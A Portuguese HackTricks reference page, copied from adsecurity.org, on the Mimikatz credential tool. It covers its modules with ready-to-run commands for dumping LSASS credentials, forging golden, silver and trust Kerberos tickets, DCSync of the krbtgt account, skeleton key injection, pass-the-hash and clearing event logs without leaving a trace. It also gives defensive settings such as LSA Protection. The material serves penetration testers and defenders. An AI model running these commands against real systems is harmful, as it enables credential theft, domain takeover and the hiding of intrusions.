# Mimikatz
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 * Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com) * **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
O conteúdo desta página foi copiado [adsecurity.org](https://adsecurity.org/?page\_id=1821) ## LM e texto claro na memória A partir do Windows 8.1 e do Windows Server 2012 R2, o hash LM e a senha em "texto claro" não estão mais na memória. Para evitar que a senha em "texto claro" seja colocada no LSASS, a seguinte chave de registro precisa ser definida como "0" (Digest Disabled): _HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)_ ## **Mimikatz & Proteção LSA:** O Windows Server 2012 R2 e o Windows 8.1 incluem um novo recurso chamado Proteção LSA que envolve a ativação do [LSASS como um processo protegido no Windows Server 2012 R2](https://technet.microsoft.com/en-us/library/dn408187.aspx) (Mimikatz pode contornar com um driver, mas isso deve gerar algum ruído nos logs de eventos): _O LSA, que inclui o Serviço do Servidor de Autoridade de Segurança Local (LSASS) processa a validação de usuários para logins locais e remotos e faz cumprir as políticas de segurança locais. O sistema operacional Windows 8.1 fornece proteção adicional para o LSA para evitar a leitura de memória e a injeção de código por processos não protegidos. Isso fornece segurança adicional para as credenciais que o LSA armazena e gerencia._ Ativando a proteção LSA: 1. Abra o Editor de Registro (RegEdit.exe) e navegue até a chave de registro localizada em: HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa e defina o valor da chave de registro como: “RunAsPPL”=dword:00000001. 2. Crie uma nova GPO e navegue até Configuração do Computador, Preferências, Configurações do Windows. Clique com o botão direito em Registro, aponte para Novo e clique em Item de Registro. A caixa de diálogo Novas Propriedades do Registro aparece. Na lista Hive, clique em HKEY\_LOCAL\_MACHINE. Na lista Caminho da Chave, navegue até SYSTEM\CurrentControlSet\Control\Lsa. Na caixa Nome do Valor, digite RunAsPPL. Na caixa Tipo de Valor, clique em REG\_DWORD. Na caixa Dados do Valor, digite 00000001. Clique em OK. A Proteção LSA impede que processos não protegidos interajam com o LSASS. Mimikatz ainda pode contornar isso com um driver ("!+"). ``` sc config TrustedInstaller binPath= "C:\Users\Public\procdump64.exe -accepteula -ma lsass.exe C:\Users\Public\lsass.dmp" sc start TrustedInstaller ``` [![TrustedInstaller-Dump-Lsass](https://1860093151-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M6yZUYP7DLMbZuztKpV%2Fuploads%2FJtprjloNPADNSpb6S0DS%2Fimage.png?alt=media&token=9b639459-bd4c-4897-90af-8990125fa058) Este arquivo de despejo pode ser exfiltrado para um computador controlado pelo atacante, onde as credenciais podem ser extraídas. ``` # privilege::debug # sekurlsa::minidump lsass.dmp # sekurlsa::logonpasswords ``` ## Principal ### **EVENTO** **EVENTO::Limpar** – Limpar um registro de evento\ [\ ![Mimikatz-Evento-Limpar](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear.png) **EVENTO:::Desativar** – (_**experimental**_) Patch no serviço de Eventos para evitar novos eventos [![Mimikatz-Evento-Desativar](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Drop.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Drop.png) Nota:\ Execute privilege::debug e depois event::drop para fazer o patch no registro de eventos. Em seguida, execute Evento::Limpar para limpar o registro de eventos sem que nenhum evento de limpeza de log (1102) seja registrado. ### KERBEROS #### Golden Ticket Um Golden Ticket é um TGT usando o hash de senha NTLM do KRBTGT para criptografar e assinar. Um Golden Ticket (GT) pode ser criado para se passar por qualquer usuário (real ou imaginário) no domínio como membro de qualquer grupo no domínio (fornecendo uma quantidade virtualmente ilimitada de direitos) para qualquer e todos os recursos no domínio. **Referência de Comando do Golden Ticket Mimikatz:** O comando Mimikatz para criar um golden ticket é “kerberos::golden” * /domínio – o nome de domínio totalmente qualificado. Neste exemplo: “lab.adsecurity.org”. * /sid – o SID do domínio. Neste exemplo: “S-1-5-21-1473643419-774954089-2222329127”. * /sids – SIDs adicionais para contas/grupos na floresta AD com direitos que você deseja falsificar no ticket. Tipicamente, este será o grupo Administradores da Empresa para o domínio raiz “S-1-5-21-1473643419-774954089-5872329127-519”. [Este parâmetro adiciona os SIDs fornecidos ao parâmetro de Histórico de SID.](https://adsecurity.org/?p=1640) * /usuário – nome de usuário para se passar * /grupos (opcional) – RIDs de grupos dos quais o usuário é membro (o primeiro é o grupo principal).\ Adicione RIDs de contas de usuário ou computador para receber o mesmo acesso.\ Grupos Padrão: 513,512,520,518,519 para os grupos de Administradores conhecidos (listados abaixo). * /krbtgt – hash de senha NTLM para a conta de serviço KDC do domínio (KRBTGT). Usado para criptografar e assinar o TGT. * /ticket (opcional) – forneça um caminho e nome para salvar o arquivo Golden Ticket para uso posterior ou use /ptt para injetar imediatamente o golden ticket na memória para uso. * /ptt – como alternativa ao /ticket – use isso para injetar imediatamente o ticket forjado na memória para uso. * /id (opcional) – RID do usuário. O valor padrão do Mimikatz é 500 (RID da conta de Administrador padrão). * /startoffset (opcional) – o deslocamento de início quando o ticket está disponível (geralmente definido como -10 ou 0 se esta opção for usada). O valor padrão do Mimikatz é 0. * /endin (opcional) – tempo de vida do ticket. O valor padrão do Mimikatz é 10 anos (\~5.262.480 minutos). A configuração de política Kerberos padrão do Active Directory é 10 horas (600 minutos). * /renewmax (opcional) – tempo de vida máximo do ticket com renovação. O valor padrão do Mimikatz é 10 anos (\~5.262.480 minutos). A configuração de política Kerberos padrão do Active Directory é 7 dias (10.080 minutos). * /sids (opcional) – defina como o SID do grupo Administradores da Empresa na floresta AD (\[SID do DomínioRaizAD\]-519) para falsificar direitos de Administrador da Empresa em toda a floresta AD (admin AD em todos os domínios na Floresta AD). * /aes128 – a chave AES128 * /aes256 – a chave AES256 Grupos Padrão do Golden Ticket: * SID de Usuários do Domínio: S-1-5-21\-513 * SID de Administradores do Domínio: S-1-5-21\-512 * SID de Administradores de Esquema: S-1-5-21\-518 * SID de Administradores da Empresa: S-1-5-21\-519 (isso é eficaz apenas quando o ticket forjado é criado no domínio raiz da Floresta, embora seja adicionado usando o parâmetro /sids para direitos de administração da floresta AD) * SID de Proprietários de Criadores de Políticas de Grupo: S-1-5-21\-520 ``` .\mimikatz "kerberos::golden /User:Administrator /domain:rd.lab.adsecurity.org /id:512 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit ``` [Golden tickets em diferentes domínios](https://adsecurity.org/?p=1640) #### Silver Ticket Um Silver Ticket é um TGS (similar ao TGT em formato) usando o hash de senha NTLM da conta de serviço de destino (identificada pelo mapeamento SPN) para criptografar e assinar. **Exemplo de Comando Mimikatz para Criar um Silver Ticket:** O seguinte comando Mimikatz cria um Silver Ticket para o serviço CIFS no servidor adsmswin2k8r2.lab.adsecurity.org. Para que este Silver Ticket seja criado com sucesso, o hash de senha da conta de computador AD para adsmswin2k8r2.lab.adsecurity.org precisa ser descoberto, seja a partir de um dump de domínio AD ou executando o Mimikatz no sistema local, conforme mostrado acima (_Mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit_). O hash de senha NTLM é usado com o parâmetro /rc4. O tipo de SPN de serviço também precisa ser identificado no parâmetro /service. Por fim, o nome de domínio totalmente qualificado do computador de destino precisa ser fornecido no parâmetro /target. Não se esqueça do SID do domínio no parâmetro /sid. ``` mimikatz “kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit ``` #### [**Trust Ticket**](https://adsecurity.org/?p=1588) Uma vez que o hash da senha de confiança do Active Directory é determinado, um trust ticket pode ser gerado. Os trust tickets são criados usando a senha compartilhada entre 2 Domínios que confiam um no outro.\ [Mais informações sobre Trust Tickets.](https://adsecurity.org/?p=1588) **Despejando senhas de confiança (chaves de confiança)** ``` Mimikatz “privilege::debug” “lsadump::trust /patch” exit ``` **Criar um ticket de confiança forjado (TGT entre reinos) usando o Mimikatz** Forjar o ticket de confiança que afirma que o detentor do ticket é um Administrador Empresarial na Floresta AD (alavancando SIDHistory, "sids", através de confianças no Mimikatz, minha "contribuição" para o Mimikatz). Isso permite acesso administrativo total de um domínio filho para o domínio pai. Observe que essa conta não precisa existir em nenhum lugar, pois é efetivamente um Golden Ticket através da confiança. ``` Mimikatz “Kerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-3677078698-724690114-1972670770 /sids:S-1-5-21-1581655573-3923512380-696647894-519 /rc4:49ed1653275f78846ff06de1a02386fd /user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\temp\tickets\EA-ADSECLABCHILD.kirbi” exit ``` ### Parâmetros Obrigatórios Específicos do Trust Ticket: - **target** - o FQDN do domínio alvo. - **service** - o serviço Kerberos em execução no domínio alvo (krbtgt). - **rc4** - o hash NTLM para a conta de serviço do serviço Kerberos (krbtgt). - **ticket** - forneça um caminho e nome para salvar o arquivo de ticket forjado para uso posterior ou use /ptt para injetar imediatamente o ticket dourado na memória para uso posterior. #### **Mais sobre KERBEROS** **KERBEROS::List** - Lista todos os tickets de usuário (TGT e TGS) na memória do usuário. Não são necessários privilégios especiais, pois ele apenas exibe os tickets do usuário atual.\ Semelhante à funcionalidade de "klist". **KERBEROS::PTC** - passar o cache (NT6)\ Sistemas *Nix como Mac OS, Linux, BSD, Unix, etc, armazenam em cache credenciais Kerberos. Esses dados em cache podem ser copiados e passados usando o Mimikatz. Também útil para injetar tickets Kerberos em arquivos ccache. Um bom exemplo do kerberos::ptc do Mimikatz é ao [explorar o MS14-068 com o PyKEK](https://adsecurity.org/?p=676). O PyKEK gera um arquivo ccache que pode ser injetado com o Mimikatz usando kerberos::ptc. **KERBEROS::PTT** - passar o ticket\ Depois que um [ticket Kerberos é encontrado](https://adsecurity.org/?p=1667), ele pode ser copiado para outro sistema e passado para a sessão atual, simulando efetivamente um logon sem nenhuma comunicação com o Controlador de Domínio. Não são necessários direitos especiais.\ Semelhante a SEKURLSA::PTH (Pass-The-Hash). - /nome do arquivo - o nome do arquivo do ticket (pode ser múltiplo) - /diretório - um caminho de diretório, todos os arquivos .kirbi dentro serão injetados. **KERBEROS::Purge** - purgar todos os tickets Kerberos\ Semelhante à funcionalidade de "klist purge". Execute este comando antes de passar tickets (PTC, PTT, etc) para garantir que o contexto do usuário correto seja usado. **KERBEROS::TGT** - obter o TGT atual para o usuário atual. ### LSADUMP **LSADUMP**::**DCShadow** - Define as máquinas atuais como DC para ter a capacidade de criar novos objetos dentro do DC (método persistente).\ Isso requer direitos de administração completos do AD ou o hash da senha do KRBTGT.\ O DCShadow temporariamente define o computador como "DC" para fins de replicação: - Cria 2 objetos na partição de Configuração da floresta AD. - Atualiza o SPN do computador usado para incluir "GC" (Catálogo Global) e "E3514235-4B06-11D1-AB04-00C04FC2DCD2" (Replicação AD). Mais informações sobre Nomes Principais de Serviço Kerberos na [seção SPN da ADSecurity](https://adsecurity.org/?page_id=183). - Envia as atualizações para DCs via DrsReplicaAdd e KCC. - Remove os objetos criados da partição de Configuração. **LSADUMP::DCSync** - pedir a um DC para sincronizar um objeto (obter dados de senha para a conta)\ [Requer associação ao Administrador de Domínio, Administradores de Domínio ou delegação personalizada.](https://adsecurity.org/?p=1729) Um recurso importante adicionado ao Mimkatz em agosto de 2015 é o "DCSync", que efetivamente "impersonifica" um Controlador de Domínio e solicita dados de senha da conta do Controlador de Domínio direcionado. **Opções do DCSync:** - /all - DCSync puxa dados para todo o domínio. - /user - ID de usuário ou SID do usuário para o qual deseja puxar os dados. - /domínio (opcional) - FQDN do domínio do Active Directory. O Mimikatz descobrirá um DC no domínio para se conectar. Se este parâmetro não for fornecido, o Mimikatz usará o domínio atual como padrão. - /csv - exportar para csv - /dc (opcional) - Especifique o Controlador de Domínio ao qual o DCSync deve se conectar e coletar dados. Também há um parâmetro /guid. **Exemplos de Comando DCSync:** Puxar dados de senha para a conta de usuário KRBTGT no domínio rd.adsecurity.org:\ _Mimikatz "lsadump::dcsync /domínio:rd.adsecurity.org /user:krbtgt" exit_ Puxar dados de senha para a conta de usuário Administrador no domínio rd.adsecurity.org:\ _Mimikatz "lsadump::dcsync /domínio:rd.adsecurity.org /user:Administrador" exit_ Puxar dados de senha para a conta de computador ADSDC03 do Controlador de Domínio no domínio lab.adsecurity.org:\ _Mimikatz "lsadump::dcsync /domínio:lab.adsecurity.org /user:adsdc03$" exit_ **LSADUMP::LSA** - Solicitar ao Servidor LSA para recuperar SAM/AD enterprise (normal, patch on the fly ou injectar). Use /patch para um subconjunto de dados, use /inject para tudo. _Requer direitos de Sistema ou Debug._ - /inject - Injetar LSASS para extrair credenciais - /nome - nome da conta para a conta de usuário alvo - /id - RID para a conta de usuário alvo - /patch - patch LSASS. Frequentemente, contas de serviço são membros de Administradores de Domínio (ou equivalente) ou um Administrador de Domínio foi recentemente conectado ao computador de onde um invasor pode extrair credenciais. Usando essas credenciais, um invasor pode obter acesso a um Controlador de Domínio e obter todas as credenciais do domínio, incluindo o hash NTLM da conta KRBTGT que é usado para criar Tickets Dourados Kerberos. ``` mimikatz lsadump::lsa /inject exit ``` **LSADUMP::NetSync** NetSync fornece uma maneira simples de usar os dados de senha de uma conta de computador DC para se passar por um Controlador de Domínio via um Silver Ticket e DCSync as informações da conta alvo, incluindo os dados de senha. **LSADUMP::SAM** - obter o SysKey para descriptografar as entradas SAM (do registro ou hive). A opção SAM se conecta ao banco de dados local do Gerenciador de Contas de Segurança (SAM) e extrai credenciais para contas locais. **LSADUMP::Secrets** - obter o SysKey para descriptografar as entradas SECRETS (do registro ou hives). **LSADUMP::SetNTLM** - Solicitar a um servidor para definir uma nova senha/NTLM para um usuário. [**LSADUMP::Trust**](https://adsecurity.org/?p=1588) - Solicitar ao Servidor LSA para recuperar Informações de Autenticação de Confiança (normal ou patch on the fly). ### MISC [**MISC::Skeleton**](https://adsecurity.org/?p=1275) - Injetar uma Chave Esquelética no processo LSASS em um Controlador de Domínio. ``` "privilege::debug" "misc::skeleton" ``` ### PRIVILÉGIO **PRIVILEGE::Backup** - obter privilégios/direitos de backup. Requer direitos de depuração. **PRIVILEGE::Debug** - obter direitos de depuração (isso ou direitos do Sistema Local são necessários para muitos comandos do Mimikatz). ### SEKURLSA **SEKURLSA::Credman** - Lista Gerenciador de Credenciais **SEKURLSA::Ekeys** - Lista chaves de criptografia Kerberos **SEKURLSA::Kerberos** - Lista credenciais Kerberos para todos os usuários autenticados (incluindo serviços e conta de computador) **SEKURLSA::Krbtgt** - obter dados de senha da conta de serviço Kerberos do Domínio (KRBTGT) **SEKURLSA::SSP** - Lista credenciais SSP **SEKURLSA::Wdigest** - Lista credenciais WDigest **SEKURLSA::LogonPasswords** - lista todas as credenciais de provedores disponíveis. Isso geralmente mostra as credenciais de usuário e computador que fizeram login recentemente. * Despeja dados de senha no LSASS para contas atualmente logadas (ou logadas recentemente), bem como serviços em execução sob o contexto das credenciais do usuário. * As senhas das contas são armazenadas na memória de forma reversível. Se estiverem na memória (antes do Windows 8.1/Windows Server 2012 R2, estavam), elas são exibidas. O Windows 8.1/Windows Server 2012 R2 não armazena a senha da conta dessa maneira na maioria dos casos. O KB2871997 "retrocede" essa capacidade de segurança para o Windows 7, Windows 8, Windows Server 2008R2 e Windows Server 2012, embora o computador precise de configuração adicional após aplicar o KB2871997. * Requer acesso de administrador (com direitos de depuração) ou direitos do Sistema Local **SEKURLSA::Minidump** - alterna para o contexto do processo de despejo minidump do LSASS (ler despejo lsass) **SEKURLSA::Pth** - Pass-the-Hash e Over-Pass-the-Hash (também conhecido como pass the key). _Mimikatz pode realizar a operação bem conhecida 'Pass-The-Hash' para executar um processo sob outras credenciais com o hash NTLM da senha do usuário, em vez de sua senha real. Para isso, ele inicia um processo com uma identidade falsa, em seguida, substitui as informações falsas (hash NTLM da senha falsa) por informações reais (hash NTLM da senha real)._ * /user - o nome de usuário que você deseja se passar, lembrando que Administrador não é o único nome para essa conta bem conhecida. * /domain - o nome de domínio totalmente qualificado - sem domínio ou no caso de usuário/administrador local, use o nome do computador ou servidor, grupo de trabalho ou o que for. * /rc4 ou /ntlm - opcional - a chave RC4 / hash NTLM da senha do usuário. * /run - opcional - a linha de comando a ser executada - o padrão é: cmd para ter um shell. [![Mimikatz-Sekurlsa-PTH](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH.jpg)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH.jpg) **SEKURLSA::Tickets** - Lista todos os tickets Kerberos disponíveis para todos os usuários autenticados recentemente, incluindo serviços em execução sob o contexto de uma conta de usuário e a conta de computador AD local.\ Ao contrário de kerberos::list, sekurlsa usa leitura de memória e não está sujeito a restrições de exportação de chaves. sekurlsa pode acessar tickets de outras sessões (usuários). * /export - opcional - os tickets são exportados em arquivos .kirbi. Eles começam com o LUID do usuário e número do grupo (0 = TGS, 1 = ticket do cliente(?) e 2 = TGT) Semelhante ao despejo de credenciais do LSASS, usando o módulo sekurlsa, um atacante pode obter todos os dados de tickets Kerberos na memória de um sistema, incluindo aqueles pertencentes a um administrador ou serviço.\ Isso é extremamente útil se um atacante comprometeu um servidor web configurado para delegação Kerberos que os usuários acessam com um servidor SQL de backend. Isso permite que um atacante capture e reutilize todos os tickets de usuário na memória desse servidor. O comando "kerberos::tickets" do mimikatz despeja os tickets Kerberos do usuário atualmente logado e não requer direitos elevados. Aproveitando a capacidade do módulo sekurlsa de ler da memória protegida (LSASS), todos os tickets Kerberos no sistema podem ser despejados. Comando: _mimikatz sekurlsa::tickets exit_ * Despeja todos os tickets Kerberos autenticados em um sistema. * Requer acesso de administrador (com depuração) ou direitos do Sistema Local ### SID O módulo SID do Mimikatz substitui MISC::AddSID. Use SID::Patch para patch no serviço ntds. **SID::add** - Adiciona um SID ao SIDHistory de um objeto [![Mimikatz-SID-add](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add.png) **SID::modify** - Modifica o SID do objeto de um objeto [![Mimikatz-SID-Modify](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify.png) ### TOKEN O módulo Token do Mimikatz permite ao Mimikatz interagir com tokens de autenticação do Windows, incluindo pegar e se passar por tokens existentes. **TOKEN::Elevate** - se passar por um token. Usado para elevar permissões para SYSTEM (padrão) ou encontrar um token de administrador de domínio na máquina usando a API do Windows.\ _ Requer direitos de administrador._ [![Mimikatz-Token-Elevate1](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate1-1.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate1-1.png) Encontre uma credencial de administrador de domínio na máquina e use esse token: _token::elevate /domainadmin_ [![Mimikatz-Token-Elevate-DomainAdmin](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate-DomainAdmin.jpg)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate-DomainAdmin.jpg) **TOKEN::List** - lista todos os tokens do sistema ### TS **TS::MultiRDP** - (experimental) Patch no serviço Terminal Server para permitir vários usuários [![Mimikatz-TS-MultiRDP](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-TS-MultiRDP.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-TS-MultiRDP.png) **TS::Sessions** - Lista sessões TS/RDP. ![](https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-TS-Sessions.png) ### Vault `mimikatz.exe "privilege::debug" "token::elevate" "vault::cred /patch" "exit"` - Obter senhas de tarefas agendadas